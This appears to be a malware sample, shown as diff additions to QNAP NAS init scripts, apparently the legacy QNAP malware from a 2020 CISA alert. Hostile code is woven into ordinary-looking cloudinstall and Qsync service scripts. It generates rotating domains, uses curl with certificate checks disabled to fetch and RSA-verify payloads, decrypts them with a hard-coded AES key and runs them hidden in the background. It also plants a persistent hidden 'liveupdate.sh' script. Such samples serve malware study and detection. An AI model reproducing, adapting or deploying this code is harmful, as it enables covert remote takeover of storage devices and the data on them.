+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    exit 1
+esac
+exit 0
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	exit 0
+fi
+fi

2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/a9364f3faffa71acb51b7035738cbd5e7438721b9d2be120e46b5fd3b23c6c18

@@ -0,0 +1,568 @@
+#!/bin/sh
+( exec >/dev/null 2>&1; (
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+test -d "$confdir" || confdir=/etc/config
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
+\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
+//I;s/\(^\|\
+\)\[[^\
+]\+\]\
+.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+test "$fgrep" || fgrep=grep
+
+if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
+test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
+#!/bin/sh
+QNAP_QPKG=cloudinstall
+QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
+NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
+CLOUD_INSTALL_PATH=/tunnel_agent
+CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
+CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
+COUNTER=1
+ERROR_BAD_REQUEST=400
+
+if [ "$fromrcS" = 'TRUE' ]; then
+case "$1" in
+  start)
+    START_TIME=$(date +"%T")
+    echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
+    while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
+    do
+        # report device info and get cloudinstall agent app download url
+        DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
+        if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
+            if [ "$NAS_ARCH" == "ARM_64" ]; then
+                # create ramdisk and create a 64mb file
+                /bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
+                /bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
+                # create block size 1K filesystem
+                /sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
+                # create virtual disk
+                export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
+                /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                # mount virtual disk
+                /bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
+            else
+                # create and mount tmpfs folder
+                /bin/mkdir -p $CLOUD_INSTALL_PATH
+                /bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
+            fi
+        fi
+        cd $CLOUD_INSTALL_PATH
+
+        if [[ $DOWNLOAD_URL == https* ]]; then
+            REPORT_SUCCESS_TIME=$(date +"%T")
+        else
+            REPORT_FAIL_TIME=$(date +"%T")
+            echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
+            # stop retry when got bad request
+            # prevent put bad request all the time
+            if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
+                break
+            fi
+        fi
+
+        # downlaod cloudinstall agent app
+        /usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
+
+        if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
+            DOWNLOAD_FINISH_TIME=$(date +"%T")
+            # unzip and execute cloudinstallagent
+            /bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
+            $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
+
+            UNZIP_TIME=$(date +"%T")
+        fi
+
+        if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+            # create folder and create symbolic link
+            /bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
